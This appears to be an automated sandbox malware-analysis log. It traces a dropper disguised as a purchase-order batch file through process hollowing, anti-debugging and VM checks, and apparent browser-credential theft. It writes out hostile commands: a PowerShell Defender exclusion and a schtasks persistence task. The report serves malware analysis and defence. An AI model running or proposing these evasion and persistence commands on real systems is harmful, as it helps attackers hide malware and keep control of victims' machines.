                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2830000 memory commit 500006912
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2831000 memory commit 500178944
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 285C000 memory commit 500002816
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 285D000 memory commit 500199424
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 288E000 memory commit 501014528
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2986000 memory commit 500006912
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2988000 memory commit 500015104
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 27C0000 memory commit 500006912Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 27C1000 memory commit 500178944Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 27EC000 memory commit 500002816Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 27ED000 memory commit 500199424Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 281E000 memory commit 501014528Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2916000 memory commit 500006912Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2918000 memory commit 500015104Jump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2800000 memory commit 500006912
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2801000 memory commit 500178944
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 282C000 memory commit 500002816
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 282D000 memory commit 500199424
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 285E000 memory commit 501014528
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2956000 memory commit 500006912
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: 2958000 memory commit 500015104
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 25680000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 25A80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 25980000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 21C0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 4390000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 5AD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMemory allocated: 2DAD0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 13B0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeMemory allocated: 4E60000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 1D640000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 1DB90000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 1D9D0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2DB60000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 2E060000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: 30060000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 1650000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 3490000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMemory allocated: 32F0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6123Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1718Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeWindow / User API: threadDelayed 1066
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_7-14269
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 5460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 1532Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596Thread sleep count: 6123 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6156Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512Thread sleep count: 1718 > 30Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 6580Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pif TID: 6168Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7136Thread sleep time: -63960000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7136Thread sleep time: -60000s >= -30000s
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_027C58B4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeThread delayed: delay time: 60000
                            Source: rpkhzpuO.pif, 00000007.00000002.2127772840.0000000023BF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: x.exe, 00000004.00000002.2065211434.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: x.exe, 00000004.00000002.2065211434.000000000054E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                            Source: rpkhzpuO.pif, 00000007.00000002.2127772840.0000000023BF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yA
                            Source: Microsofts.exe, 00000009.00000002.3264032203.0000000001293000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                            Source: x.exe, 00000004.00000002.2065211434.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
                            Source: Oupzhkpr.PIF, 0000000E.00000002.2164184214.000000000078E000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000002.2250069764.0000000000845000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-25458
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end nodegraph_14-26830
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFAPI call chain: ExitProcess graph end node
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DEBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_027DEBF0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess queried: DebugPort
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,7_2_004019F0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_027D87A0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_0040ADB0 GetProcessHeap,HeapFree,7_2_0040ADB0
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeProcess token adjusted: Debug
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040E61C
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00416F6A
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_004123F1 SetUnhandledExceptionFilter,7_2_004123F1
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_1_0040CE09
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_1_0040E61C
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_1_00416F6A
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_1_004123F1 SetUnhandledExceptionFilter,7_1_004123F1
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0040CE09
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_0040E61C
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00416F6A
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_2_004123F1 SetUnhandledExceptionFilter,18_2_004123F1
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_1_0040CE09
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_1_0040E61C
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_1_00416F6A
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 18_1_004123F1 SetUnhandledExceptionFilter,18_1_004123F1
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040CE09
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040E61C
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00416F6A
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_2_004123F1 SetUnhandledExceptionFilter,23_2_004123F1
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_1_0040CE09
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_1_0040E61C
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_1_00416F6A
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 23_1_004123F1 SetUnhandledExceptionFilter,23_1_004123F1
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: Microsofts.exe.7.dr, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                            Source: Microsofts.exe.7.dr, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                            Source: Microsofts.exe.7.dr, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and writeJump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory allocated: C:\Users\Public\Libraries\rpkhzpuO.pif base: 400000 protect: page execute and read and write
                            Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000Jump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFSection unmapped: C:\Users\Public\Libraries\rpkhzpuO.pif base address: 400000
                            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 3B4008Jump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 2B5008
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFMemory written: C:\Users\Public\Libraries\rpkhzpuO.pif base: 27B008
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\PO#5_Tower_049.bat" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pifJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /fJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_027C5A78
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_027CA74C
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,4_2_027CA798
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_027C5B84
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,7_2_00417A20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,7_1_00417A20
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_02835A78
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetLocaleInfoA,14_2_0283A798
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,14_2_02835B83
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,18_2_00417A20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,18_1_00417A20
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,20_2_02805A78
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetLocaleInfoA,20_2_0280A798
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,20_2_02805B83
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,23_2_00417A20
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,23_1_00417A20
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
